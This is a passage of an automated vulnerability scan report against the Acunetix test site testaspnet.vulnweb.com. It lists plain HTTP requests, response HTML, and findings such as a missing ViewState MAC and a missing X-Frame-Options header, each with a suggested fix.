CAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVArvjq48MAu2JnvwLAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w8CjfeklgcCjfeklgcCjffYKgKN99gqAo33jJINAo33jJINAo33oKkGAo33oKkGAuads94JAuads94JAuadp/UCAuadp/UCAuad24kKAuad24kKAuadz6wDAuadz6wDAuad48MMAuad48MMAuadl+YFAuadl+YFAuadi70NAuadi70NAuadv9AGAuadv9AGAuadk7kDAuadk7kDAuadh9wMAuadh9wMAvukkcUPAvukkcUPAvukhZgHAvukhZgHAvukuT8C+6S5PwL7pK3SCQL7pK3SCQL7pMH2AgL7pMH2AgL7pPWNCgL7pPWNCgL7pOmgAwL7pOmgAwL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DyY4AmtQ6l9yclXqngVcemir9JWK" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Ensure the MAC is set for all pages on this website.

  3. Risk=中等的, Confidence=中等的 (26)

    1. http://testaspnet.vulnweb.com (26)

      1. X-Frame-Options Header Not Set (26)
        1. GET http://testaspnet.vulnweb.com
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (211 bytes)
          GET http://testaspnet.vulnweb.com HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:16 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
